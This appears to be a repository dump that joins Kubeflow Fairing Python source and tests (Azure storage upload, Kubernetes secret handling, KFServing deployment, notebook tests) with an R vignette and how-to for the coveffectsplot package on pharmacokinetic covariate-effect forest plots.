logging.getLogger().setLevel(logging.INFO)
fire.Fire({0})
""".format(self.class_name))
self.executable = converted_notebook
results = [converted_notebook]
results.extend(self.input_files)
return results
<file_sep>/tests/integration/azure/test_running_in_notebooks.py
import os
import logging
from ..helpers import run_notebook_test
logger = logging.getLogger(__name__)
def update_parameters(parameters, parameter_name):
if parameter_name in os.environ:
parameters[parameter_name] = os.environ[parameter_name]
def test_xgboost_highlevel_apis():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat",
"Deploying the endpoint.",
"Prediction endpoint: http",
"Deleting the endpoint."
]
parameters = {
"FAIRING_BACKEND": "KubeflowAzureBackend"
}
update_parameters(parameters, "DOCKER_REGISTRY")
update_parameters(parameters, "AZURE_RESOURCE_GROUP")
update_parameters(parameters, "AZURE_STORAGE_ACCOUNT")
update_parameters(parameters, "AZURE_REGION")
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
<file_sep>/tests/integration/helpers.py
import tempfile
import logging
import os
import papermill
logger = logging.getLogger(__name__)
def execute_notebook(notebook_path, parameters=None):
temp_dir = tempfile.mkdtemp()
notebook_output_path = os.path.join(temp_dir, "out.ipynb")
papermill.execute_notebook(notebook_path, notebook_output_path,
cwd=os.path.dirname(notebook_path),
parameters=parameters)
return notebook_output_path
def run_notebook_test(notebook_path, expected_messages, parameters=None):
output_path = execute_notebook(notebook_path, parameters=parameters)
actual_output = open(output_path, 'r').read()
# TODO (karthikv2k): use something like https://github.com/nteract/scrapbook
# for reading notebooks
for expected_message in expected_messages:
# TODO (karthikv2k): find a better way to test notebook execution success
if not expected_message in actual_output:
logger.error(actual_output)
assert False, "Unable to find from output: " + expected_message
<file_sep>/kubeflow/fairing/backends/__init__.py
from kubeflow.fairing.backends.backends import *
<file_sep>/tests/integration/azure/test_azure_file_uploader.py
import os
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.storage.models import StorageAccount
from kubeflow.fairing.cloud.azure import AzureFileUploader
STORAGE_ACCOUNT_NAME = os.environ.get('AZURE_STORAGE_ACCOUNT')
RESOURCE_GROUP = os.environ.get('AZURE_RESOURCE_GROUP')
REGION = os.environ.get('AZURE_REGION')
def test_storage_account_creation():
credentials = ServicePrincipalCredentials(
client_id=os.environ.get('AZ_CLIENT_ID'),
secret=os.environ.get('AZ_CLIENT_SECRET'),
tenant=os.environ.get('AZ_TENANT_ID')
)
subscription_id = os.environ.get('AZ_SUBSCRIPTION_ID')
file_uploader = AzureFileUploader(
RESOURCE_GROUP, credentials=credentials, subscription_id=subscription_id
)
storage_account = file_uploader.create_storage_account_if_not_exists(
REGION, RESOURCE_GROUP, STORAGE_ACCOUNT_NAME
)
assert isinstance(storage_account, StorageAccount)
assert storage_account.name == STORAGE_ACCOUNT_NAME
<file_sep>/tests/integration/gcp/test_running_in_notebooks.py
import os
import pytest
from ..helpers import run_notebook_test
@pytest.mark.skip(reason="GCPManaged backend needs to take build context as input")
def test_xgboost_highlevel_apis_gcp_managed():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat", # KF training
"Access job logs at the following URL:", # GCP managed submission success
"Prediction endpoint: http", # create endpoint success
]
parameters = {
"FAIRING_BACKEND": "GCPManagedBackend"
}
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
def test_xgboost_highlevel_apis_gke():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/prediction/xgboost-high-level-apis.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Model export success: trained_ames_model.dat", #KF training
"Prediction endpoint: http", #create endpoint success
]
parameters = {
"FAIRING_BACKEND": "KubeflowGKEBackend"
}
run_notebook_test(notebook_abs_path, expected_messages, parameters=parameters)
def test_lightgbm():
file_dir = os.path.dirname(__file__)
notebook_rel_path = "../../../examples/lightgbm/distributed-training.ipynb"
notebook_abs_path = os.path.normpath(
os.path.join(file_dir, notebook_rel_path))
expected_messages = [
"Copying gs://fairing-lightgbm/regression-example/regression.train.weight",
"[LightGBM] [Info] Finished initializing network", # dist training setup
"[LightGBM] [Info] Iteration:10, valid_1 l2 : 0.2",
"[LightGBM] [Info] Finished training",
"Prediction mean: 0.5",
", count: 500"
]
run_notebook_test(notebook_abs_path, expected_messages)
<file_sep>/kubeflow/fairing/deployers/kfserving/kfserving.py
import uuid
import logging
from kubernetes import client as k8s_client
from kubeflow.fairing.constants import constants
from kubeflow.fairing.deployers.deployer import DeployerInterface
from kubeflow.fairing.kubernetes.manager import KubeManager
from kubeflow.fairing import utils
logger = logging.getLogger(__name__)
class KFServing(DeployerInterface):
"""Serves a prediction endpoint using Kubeflow KFServing."""
def __init__(self, framework, default_model_uri=None, canary_model_uri=None,
canary_traffic_percent=0, namespace=None, labels=None, annotations=None,
custom_default_spec=None, custom_canary_spec=None, stream_log=True,
cleanup=False):
"""
:param framework: The framework for the kfservice, such as Tensorflow,
XGBoost and ScikitLearn etc.
:param default_model_uri: URI pointing to Saved Model assets for default service.
:param canary_model_uri: URI pointing to Saved Model assets for canary service.
:param canary_traffic_percent: The amount of traffic to sent to the canary, defaults to 0.
:param namespace: The k8s namespace where the kfservice will be deployed.
:param labels: Labels for the kfservice, separate with commas if have more than one.
:param annotations: Annotations for the kfservice,
separate with commas if have more than one.
:param custom_default_spec: A flexible custom default specification for arbitrary customer
provided containers.
:param custom_canary_spec: A flexible custom canary specification for arbitrary customer
provided containers.
:param stream_log: Show log or not when kfservice started, defaults to True.
:param cleanup: Delete the kfserving or not, defaults to False.
"""
self.framework = framework
self.default_model_uri = default_model_uri
self.canary_model_uri = canary_model_uri
self.canary_traffic_percent = canary_traffic_percent
self.annotations = annotations
self.set_labels(labels)
self.cleanup = cleanup
self.custom_default_spec = custom_default_spec
self.custom_canary_spec = custom_canary_spec
self.stream_log = stream_log
self.backend = KubeManager()
if namespace is None:
self.namespace = utils.get_default_target_namespace()
else:
self.namespace = namespace
def set_labels(self, labels):
"""set label for deployed prediction
:param labels: dictionary of labels {label_name:label_value}
"""
self.fairing_id = str(uuid.uuid1())
self.labels = {'fairing-id': self.fairing_id}
if labels:
self.labels.update(labels)
def deploy(self, template_spec): # pylint:disable=arguments-differ,unused-argument
"""deploy kfserving endpoint
:param template_spec: template spec
"""
self.kfservice = self.generate_kfservice()
self.created_kfserving = self.backend.create_kfserving(
self.namespace, self.kfservice)
if self.stream_log:
self.get_logs()
kfservice_name = self.created_kfserving['metadata']['name']
logger.warning(
"Deployed the kfservice {} successfully.".format(kfservice_name))
if self.cleanup:
logger.warning("Cleaning up kfservice {}...".format(kfservice_name))
self.backend.delete_kfserving(kfservice_name, self.namespace)
return kfservice_name
def generate_kfservice(self):
""" generate kfserving template"""
spec = {}
spec['default'] = {}
if self.framework is not 'custom': # pylint:disable=literal-comparison
if self.default_model_uri is not None:
spec['default'][self.framework] = {}
spec['default'][self.framework]['modelUri'] = self.default_model_uri
else:
raise RuntimeError(
"The default_model_uri must be defined if the framework is not custom.")
else:
if self.custom_default_spec is not None:
# TBD @jinchi Need to validate the custom_default_spec before executing.
spec['default'][self.framework] = self.custom_default_spec
else:
raise RuntimeError(
"The custom_default_spec must be defined if the framework is custom.")
if self.framework != 'custom':
if self.canary_model_uri is not None:
spec['canary'] = {}
spec['canary'][self.framework] = {}
spec['canary'][self.framework]['modelUri'] = self.canary_model_uri
spec['canaryTrafficPercent'] = self.canary_traffic_percent
else:
if self.custom_default_spec is not None:
spec['canary'] = {}
spec['canary'][self.framework] = self.custom_canary_spec
spec['canaryTrafficPercent'] = self.canary_traffic_percent
metadata = k8s_client.V1ObjectMeta(
generate_name=constants.KFSERVING_DEFAULT_NAME,
namespace=self.namespace,
labels=self.labels,
annotations=self.annotations
)
kfservice = {}
kfservice['kind'] = constants.KFSERVING_KIND
kfservice['apiVersion'] = constants.KFSERVING_GROUP + \
'/' + constants.KFSERVING_VERSION
kfservice['metadata'] = metadata
kfservice['spec'] = spec
return kfservice
def get_logs(self):
""" get log from prediction pod"""
name = self.created_kfserving['metadata']['name']
namespace = self.created_kfserving['metadata']['namespace']
self.backend.log(name, namespace, self.labels,
container=constants.KFSERVING_CONTAINER_NAME, follow=False)
<file_sep>/tests/unit/cloud/test_docker.py
from kubeflow.fairing.cloud.docker import get_docker_secret
from kubeflow.fairing.constants import constants
import json
import os
def test_docker_secret_spec():
os.environ["DOCKER_CONFIG"] = "/tmp"
config_dir = os.environ.get('DOCKER_CONFIG')
config_file_name = 'config.json'
config_file = os.path.join(config_dir, config_file_name)
with open(config_file, 'w+') as f:
json.dump({'config': "config"}, f)
docker_secret = get_docker_secret()
assert docker_secret.metadata.name == constants.DOCKER_CREDS_SECRET_NAME
os.remove(config_file)
<file_sep>/kubeflow/fairing/__init__.py
import os
from kubeflow.fairing.ml_tasks.tasks import TrainJob, PredictionEndpoint
if os.getenv('FAIRING_RUNTIME', None) is not None:
from kubeflow.fairing.runtime_config import config
else:
from kubeflow.fairing.config import config
name = "fairing"
__version__ = "0.6.0"
<file_sep>/tests/unit/cloud/test_azure.py
import base64
import uuid
from unittest.mock import patch
from kubernetes import client
from azure.common.credentials import ServicePrincipalCredentials
from kubeflow.fairing.kubernetes.manager import KubeManager
from kubeflow.fairing.cloud.azure import get_azure_credentials
TEST_CLIENT_ID = str(uuid.uuid4())
TEST_CLIENT_SECRET = str(uuid.uuid4())
TEST_TENANT_ID = str(uuid.uuid4())
TEST_SUBSCRIPTION_ID = str(uuid.uuid4())
def encode_value(value):
return base64.b64encode(value.encode())
class MockSecret(object):
def __init__(self):
self.data = {
'AZ_CLIENT_ID': encode_value(TEST_CLIENT_ID),
'AZ_CLIENT_SECRET': encode_value(TEST_CLIENT_SECRET),
'AZ_TENANT_ID': encode_value(TEST_TENANT_ID),
'AZ_SUBSCRIPTION_ID': encode_value(TEST_SUBSCRIPTION_ID)
}
# Test that credentials are parsed properly from the Kubernetes secrets.
@patch.object(KubeManager, 'secret_exists')
@patch.object(KubeManager, '__init__')
@patch.object(client.CoreV1Api, 'read_namespaced_secret')
@patch.object(ServicePrincipalCredentials, '__init__')
def test_get_azure_credentials(credentials_init_mock,
read_namespaced_secret_mock,
manager_init_mock,
secret_exists_mock):
secret_exists_mock.return_value = True
manager_init_mock.return_value = None
read_namespaced_secret_mock.return_value = MockSecret()
credentials_init_mock.return_value = None
credentials, subscription_id = get_azure_credentials('kubeflow')
credentials_init_mock.assert_called_with(
client_id=TEST_CLIENT_ID,
secret=TEST_CLIENT_SECRET,
tenant=TEST_TENANT_ID
)
assert isinstance(credentials, ServicePrincipalCredentials)
assert subscription_id == TEST_SUBSCRIPTION_ID
<file_sep>/kubeflow/fairing/cloud/azure.py
import logging
import base64
import tarfile
from pathlib import Path
from shutil import rmtree
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.storage.models import StorageAccountCreateParameters
from azure.mgmt.storage.models import Sku
from azure.mgmt.storage.models import SkuName
from azure.mgmt.storage.models import Kind
from azure.storage.file import FileService
from kubernetes import client
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
# Helper class to upload files to Azure Files
class AzureFileUploader(object):
def __init__(self, namespace, credentials=None, subscription_id=None):
if not credentials or not subscription_id:
credentials, subscription_id = get_azure_credentials(namespace)
self.storage_client = StorageManagementClient(credentials, subscription_id)
# Upload the files and dirs in a tar.gz file to a dir in a shared folder in Azure Files
def upload_to_share(self,
region,
resource_group_name,
storage_account_name,
share_name,
dir_name,
tar_gz_file_to_upload):
logging.info(
"Uploading contents of '{}' to 'https://{}.file.core.windows.net/{}/{}'"
.format(tar_gz_file_to_upload, storage_account_name, share_name, dir_name)
)
self.create_storage_account_if_not_exists(region, resource_group_name, storage_account_name)
storage_account_name, storage_key = self.get_storage_credentials(
resource_group_name, storage_account_name
)
share_service = FileService(account_name=storage_account_name, account_key=storage_key)
self.create_share_if_not_exists(share_service, share_name)
share_service.create_directory(share_name, dir_name)
self.upload_tar_gz_contents(share_service, share_name, dir_name, tar_gz_file_to_upload)
return storage_account_name, storage_key
def create_storage_account_if_not_exists(self, region, resource_group_name,
storage_account_name):
"""Creates the storage account if it does not exist.
In either case, returns the StorageAccount class that matches the given arguments."""
storage_accounts = (
self.storage_client.storage_accounts
.list_by_resource_group(resource_group_name)
)
storage_account = next(
filter(lambda storage_account:
storage_account.name == storage_account_name,
storage_accounts),
None
)
if storage_account:
return storage_account
logging.info(
"Creating Azure Storage account '{}' in Resource Group '{}'"
.format(storage_account_name, resource_group_name)
)
storage_async_operation = self.storage_client.storage_accounts.create(
resource_group_name,
storage_account_name,
StorageAccountCreateParameters(
sku=Sku(name=SkuName.standard_ragrs),
kind=Kind.storage,
location=region
)
)
return storage_async_operation.result()
def get_storage_credentials(self, resource_group_name, storage_account_name):
storage_keys = (
self.storage_client.storage_accounts
.list_keys(resource_group_name, storage_account_name)
)
storage_keys = {v.key_name: v.value for v in storage_keys.keys}
return storage_account_name, storage_keys['key1']
def create_share_if_not_exists(self, share_service, share_name):
shares = share_service.list_shares()
share = next(filter(lambda share: share.name == share_name, shares), None)
if share is None:
share_service.create_share(share_name)
def upload_tar_gz_contents(self, share_service, share_name, dir_name, tar_gz_file):
local_dir = Path('{}_contents'.format(tar_gz_file))
cloud_dir = Path(dir_name)
self.uncompress_tar_gz_file(tar_gz_file, local_dir)
for path in local_dir.glob('**/*'):
local_path = Path(path)
cloud_relative_path = cloud_dir / path.relative_to(local_dir)
if local_path.is_dir():
share_service.create_directory(share_name, cloud_relative_path)
else:
share_service.create_file_from_path(
share_name, cloud_relative_path.parents[0],
cloud_relative_path.name, local_path
)
self.delete_uncompressed_files(local_dir)
def uncompress_tar_gz_file(self, tar_gz_file, target_dir):
tar = tarfile.open(tar_gz_file, 'r:gz')
tar.extractall(path=target_dir)
tar.close()
def delete_uncompressed_files(self, target_dir):
rmtree(target_dir)
# Get credentials for a service principal which has permissions to
# create or access the storage account for Azure Files
def get_azure_credentials(namespace):
secret_name = constants.AZURE_CREDS_SECRET_NAME
if not KubeManager().secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
v1 = client.CoreV1Api()
secret = v1.read_namespaced_secret(secret_name, namespace)
sp_credentials = ServicePrincipalCredentials(
client_id=get_plain_secret_value(secret.data, 'AZ_CLIENT_ID'),
secret=get_plain_secret_value(secret.data, 'AZ_CLIENT_SECRET'),
tenant=get_plain_secret_value(secret.data, 'AZ_TENANT_ID')
)
subscription_id = get_plain_secret_value(secret.data, 'AZ_SUBSCRIPTION_ID')
return sp_credentials, subscription_id
# Decode plain text value of a secret of given key and raise an exception if the key is not found
def get_plain_secret_value(secret_data, key):
if not key in secret_data:
raise Exception("Secret with key '{}'' not found".format(key))
secret_base64 = secret_data[key]
return base64.b64decode(secret_base64).decode('utf-8')
# Create a secret with the credentials to access the storage account for Azure Files
def create_storage_creds_secret(namespace, context_hash, storage_account_name, storage_key):
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
logging.info(
"Creating secret '{}' in namespace '{}'"
.format(secret_name, namespace)
)
secret = client.V1Secret(
metadata=client.V1ObjectMeta(name=secret_name),
string_data={
'azurestorageaccountname': storage_account_name,
'azurestorageaccountkey': storage_key
})
v1 = client.CoreV1Api()
v1.create_namespaced_secret(namespace, secret)
# Delete the secret with the credentials to access the storage account for Azure Files
def delete_storage_creds_secret(namespace, context_hash):
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
logging.info(
"Deleting secret '{}' from namespace '{}'"
.format(secret_name, namespace)
)
v1 = client.CoreV1Api()
v1.delete_namespaced_secret(secret_name, namespace, body=None)
# Verify that we are working with an Azure Container Registry
def is_acr_registry(registry):
return registry.endswith('.azurecr.io')
# Mount Docker config so the pod can access Azure Container Registry
def add_acr_config(kube_manager, pod_spec, namespace):
secret_name = constants.AZURE_ACR_CREDS_SECRET_NAME
if not kube_manager.secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
volume_mount = client.V1VolumeMount(
name='acr-config', mount_path='/kaniko/.docker/', read_only=True
)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
items = [client.V1KeyToPath(key='.dockerconfigjson', path='config.json')]
volume = client.V1Volume(
name='acr-config',
secret=client.V1SecretVolumeSource(secret_name=secret_name, items=items)
)
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
# Mount Azure Files shared folder so the pod can access its files with a local path
def add_azure_files(kube_manager, pod_spec, namespace):
context_hash = pod_spec.containers[0].args[1].split(':')[-1]
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
if not kube_manager.secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
volume_mount = client.V1VolumeMount(
name='azure-files', mount_path='/mnt/azure/', read_only=True
)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
volume = client.V1Volume(
name='azure-files',
azure_file=client.V1AzureFileVolumeSource(
secret_name=secret_name, share_name=constants.AZURE_FILES_SHARED_FOLDER
)
)
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
<file_sep>/kubeflow/fairing/utils.py
import os
import zlib
import uuid
def get_image(repository, name):
"""Get the full image name by integrating repository and image name.
:param repository: The name of repository
:param name: The short image name
:returns: str: Full image name, format: repo/name.
"""
return "{repo}/{name}".format(
repo=repository,
name=name
)
def is_running_in_k8s():
"""Check if running in the kubernetes cluster."""
return os.path.isdir('/var/run/secrets/kubernetes.io/')
def get_current_k8s_namespace():
"""Get the current namespace of kubernetes."""
with open('/var/run/secrets/kubernetes.io/serviceaccount/namespace', 'r') as f:
return f.readline()
def get_default_target_namespace():
"""Get the default target namespace, if running in the kubernetes cluster,
will be current namespace, Otherwiase, will be "default".
"""
if not is_running_in_k8s():
return 'default'
return get_current_k8s_namespace()
def crc(file_name):
"""Compute a running Cyclic Redundancy Check checksum.
:param file_name: The file name that's for crc checksum.
"""
prev = 0
for eachLine in open(file_name, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
def random_tag():
"""Get a random tag."""
return str(uuid.uuid4()).split('-')[0]
|
d260f1492f1d3cffb72bd4e8c67da7b0724fa5d5
|
[
"Python",
"Text"
] | 28
|
Python
|
wyw64962771/fairing
|
0cc639870ea3f773c5ae8a53c0ab16d4cda2ea6c
|
3be92ab22d596a360c6f8d70f678b3ada265e649
|
refs/heads/master
|
<repo_name>smouksassi/interactiveforestplot<file_sep>/inst/shiny/text/howto.md
1. Upload your data file in csv format. R default options for `read.csv` will apply
except for missing values where both (NA) and dot (.) are treated as missing.
`read.csv("yourdata.csv", na.strings = c("NA", "."))`
2. The uploaded data will map automatically it is a must that you have the following column names:
+ paramname: Parameter on which the effects are shown e.g. CL, Cmax, AUC etc.
+ covname: Covariate name that the effects belong to e.g. Weight, SEX, Dose etc.
+ label: Covariate value that the effects of which is shown e.g. 50 kg, 50 kg\90 kg (here the reference value is contained in the label).
mid: Middle value for the effects usually the median from the uncertainty distribution.
+ lower: Lower value for the effects usually the 2.5% or 5% from the uncertainty distribution.
+ upper: Upper value for the effects usually the 97.5% or 95% from the uncertainty distribution.
Refer to the repo readme file for additional info:
<a href="https://github.com/smouksassi/coveffectsplot" target="_blank">Click Here to go to the github repo.</a>
The package vignettes include and introduction and multiple detailed examples:
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/introduction_to_coveffectsplot.html">Introduction to coveffectsplot.</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/PK_Example.html">PK example</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/PKPD_Example.html">PK PD example</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/Exposure_Response_Example.html">Exposure Response</a>
Contact me @ <EMAIL> for feedback/bugs/features/pull requests!
*<NAME> 2020*
<file_sep>/vignettes/introduction_to_coveffectsplot.Rmd
---
title: "Introduction to `coveffectsplot`"
author: "<NAME>"
date: "`r Sys.Date()`"
output:
rmarkdown::html_vignette:
toc: true
vignette: >
%\VignetteIndexEntry{Introduction to coveffectsplot}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r setup, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(ggplot2)
library(ggridges)
suppressPackageStartupMessages( library(dplyr) )
nuncertainty <- 10000
nbsvsubjects <- 100000
```
The use of forest plots to summarize the impact of various intrinsic and extrinsic factors on the pharmacokinetics (PK) of drugs is becoming a standard practice and a key part of submission packages to the FDA. The forest plots format make it easier for clinicians to quickly find and interpret the information they need.^[Essential pharmacokinetic information for drug dosage decisions: a concise visual presentation in the drug label. Clin Pharmacol Ther. 2011 Sep;90(3):471-4.]
## Motivation
Traditionally, a paragraph describing the various doses in various group is part of the official drug label and often a table is provided. The advantages of table versus graphs has been previously discussed and each has its own merits. While web-based interactive graphics allow on-demand mouse hovering to show the graph numbers, this is not possible on a printed sheet of paper or on a static PDF as required for a drug label. As such, combining a graphic representation of the data with a side table provides the best of both worlds and provide to the clinician an efficient way to interpret the data.
## Background on a Fictitious Drug
Let us assume that we have a drug following a first-order absorption one-compartment PK model with parameters absorption constant (Ka), Clearance (CL) and Volume of distribution (V). Usually, a nonlinear mixed effects model is fitted to the PK data and covariates covering intrinsic and extrinsic are tested on the various parameters. For simplicity, let us assume that the covariate modeling did not add any covariate on Ka and V and provided the following model for CL:
$$CL = {POPCL} \times \left( \frac { \color{blue}{Weight}} {70}\right)^{dWTdCL}\times \left( dSexdCL\times \left( \color{blue}{Sex}== 1 \right) \right)\times \left( exp(\eta{CL})\right)$$
The above equation shows that we have two covariates on CL one is Weight (kg) a continuous variable with reference value of 70 (kg) and influencing CL with a power model with coefficient dWTdCL. The second is Sex which is an indicator variable taking the value of 0 (Woman, used as the reference category) and 1 (Man) influencing CL with a coefficient dSexdCL. The last term denotes the individual deviations from the population (random effects) which assumes that CL in the population is log normally distributed. The same model can be more familiar to statisticians if re-written into a log-linear additive form:
$$log(CL) = {log(POPCL)} + dWTdCL\times log\left(\frac { \color{blue}{Weight}} {70}\right)+ \ log(dSexdCL)\times\left(\color{blue}{Sex}== 1 \right) +\eta{CL}$$
and where the individual level random effect describes the between subject variability (BSV) and is:
$$\eta{CL}\sim \mathcal{N}(0,\,\omega_{CL}^{2})$$
The modeling output would give you the value of the fixed effects parameters (POPCL, dWTdCL and dSexdCL), the variance covariance matrix of the random effects as well as the associated uncertainty from the estimated asymptotic variance covariance matrix of the various estimated parameters. Alternatively, the uncertainty can also be obtained using a nonparametric bootstrap resampling of the individuals. Oftentimes, the uncertainty is reported as a standard error or relative standard error (%). If we are interested in reporting the standard error of CL in Men there is several ways we can use to compute it: 1) error propagation using the delta method. 2) simulation from the variance covariance matrix. 3) using the bootstrap distribution.
The observed distribution of the covariates Weight and Sex in the studied population is important because, to compute the covariates effects, we need to choose values for all covariates included in the model. It is desirable to provide sensible values that would provide a good sense on where most of the patients are. A common practice is to report the effects of the 75th percentile to the 25th percentile which will cover 50% of the population, some would also want to cover 90% of the population (5th to the 95th percentiles). Of note is that we need to cover enough of the covariate range and steps(e.g. show effects at the 5th, 25th, 50th, 75th and 95th percentiles) to illustrate a nonlinear relationship like the power model.
Alternatively, we might be interested to compute effects for clinically meaningful difference e.g. 20 kg and then we report effects at 50, 70 and 90 kg. Some clinical covariates like eGFR have predefined cutoffs that we want to cover.
If the assumption of varying one covariate at a time does not hold we recommend the use of a realistic distribution of correlated covariates (simulated or real).
Finally, since the BSV cannot be controlled for, showing the distribution of the BSV is important to contrast and compare with the estimated covariate related effects as this will allow us to understand where a random subject given a known set of covariates could possibly belong. We also suggest that precomputing, BSV ranges based on percentiles of the BSV distribution is more helpful than letting the user guess the ranges from visual inspection.
## Simulating Data and Outputs from a Modeling Exercise
We will assume that the model fit had estimated parameters with relative standard errors of 15%. For this vignette, a simulation from a multivariate normal distribution with n= 10000 was used. The five first rows are shown in the table below. The assumed mean values for POPCL, dWTdCL and dSexdCL were 10, 0.75 and 1.5 respectively.
For simplicity, we will also assume that there were equal number of Sex = 1 (Man) and Sex = 0 (Woman) and that men and women had mean weights of 75 and 65 kg and the same standard deviation of 20 kg. Note that unless we explicitly code the simulation in a way to prevent negative weights (e.g. using a log normal distribution) we will end up simulating some negative ones.
```{r, echo=TRUE, results='asis',fig.align = "center",fig.width = 6}
set.seed(657687)
df <- data.frame(
MASS::mvrnorm(n = nuncertainty,
mu = c(10,0.75,1.5),
Sigma=matrix(c((10*0.15)^2,
0.001,0.001,0.001,(0.75*0.15)^2,
0.001,0.001,0.001,(1.5*0.15)^2),3,3,byrow = TRUE)
))
names(df) <- c("POPCL","dWTdCL","dSexdCL")
knitr::kable(head(round(df,2),5))
```
```{r, echo=FALSE, results='asis',fig.align = "center",fig.width = 6}
dflong <- tidyr::gather(df)
ggplot2::ggplot(dflong,ggplot2::aes(x=value,fill=key))+
ggplot2::geom_density(alpha=0.2)+
ggplot2::facet_wrap(~key,scales="free",ncol=1)+
ggplot2::labs(fill="",x="Uncertainty Distribution (RSE 15%) of the Parameters")+
ggplot2::theme(legend.position = "right",legend.background =
ggplot2::element_rect(fill="transparent"),
axis.ticks.y = element_blank(),axis.text.y =element_blank())+
ggplot2::guides(fill=ggplot2::guide_legend(reverse = FALSE))
set.seed(657687)
dfcov<- data.frame(
MASS::mvrnorm(n=nbsvsubjects,
mu =c(65,75),
Sigma=matrix(c(20^2,0.01,0.01,20^2),2,2,byrow = TRUE)
))
names(dfcov)<- c("WTWOMAN","WTMAN")
dfcovlong <- tidyr::gather(dfcov)
ggplot2::ggplot(dfcovlong,ggplot2::aes(x=value,fill=key))+
ggplot2::geom_density(alpha=0.2)+
ggplot2::labs(fill="",x="Weight (kg)")+
ggplot2::theme(legend.position = "right",legend.background =
ggplot2::element_rect(fill="transparent"),axis.ticks.y = element_blank(),axis.text.y =element_blank())+
ggplot2::guides(fill=ggplot2::guide_legend(reverse = FALSE))
dfcovlongquantile<- as.data.frame(
round(quantile(dfcovlong$value,probs=c(0.01,0.05,0.25,0.5,0.75,0.95,0.99)),0)
)
names(dfcovlongquantile)<- "Weightquantilevalue"
dfcovlongquantile$quantile<- rownames(dfcovlongquantile)
dfcovlongquantiletable<- t(dfcovlongquantile)
knitr::kable(dfcovlongquantiletable[1,,drop=FALSE],row.names=FALSE)
```
The model had a between subject variability on CL $\omega_{CL}^{2}$ variance of 0.09 which translates to apparent CV of sqrt (exp (0.09) -1) = 0.3069. A common way to report this BSV is to say we have 30.7% BSV. But what does this really mean in practical terms? What are the chances that a patient with known covariate values, will have very low or very high CL warranting dose changes?
A useful metric can be to compute the bounds where say 50% and 90% of the patients will be located using simple quantile functions on simulated distributions. For the 30.7% BSV case, we compute that 50% of the patients will be within the 0.82 to 1.23 interval (dark red area) while 90% of the patients will be within the 0.61 to 1.63 interval (lighter red area). A table showing the various quantiles is also shown. For asymmetrical distribution we can also use the highest density intervals instead of percentiles but this is not shown here.
```{r, echo=TRUE,fig.align = "center",fig.width = 6}
set.seed(546789)
CLBSVdistribution <- data.frame(CL= 10*exp(rnorm(nbsvsubjects,0,sd=0.09^0.5)))
CLBSVdistribution$CLBSV<- CLBSVdistribution$CL/10
```
```{r, echo=FALSE,fig.align = "center",fig.width = 6 ,fig.height=4}
dfbsv<- as.data.frame(
round( quantile(CLBSVdistribution$CLBSV,probs=c(0.01,0.05,0.25,0.5,0.75,0.95,0.99)),2))
names(dfbsv)<- "BSVquantilevalue"
dfbsv$quantile<- rownames(dfbsv)
CLBSVdistribution$paramname<- "CL"
bsvplot<- ggplot(CLBSVdistribution, aes(
x = CLBSV,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="BSV Ranges",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw(base_size = 16) +
theme(
legend.position = "right",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank(),
axis.text.x=ggplot2::element_text(size=12),
axis.title.x=ggplot2::element_text(size=14)) +
scale_x_continuous(breaks=c(0.61,0.82,1,1.22,1.63))+
coord_cartesian(expand=FALSE,xlim = c(0.49,2.01))+
ggplot2::labs(x="Standardized Individual Clearances with BSV",
title="Illustrating 30.7% BSV")
bsvplot
dfbsvtable<- t(dfbsv)
knitr::kable(dfbsvtable[1,,drop=FALSE],row.names=FALSE)
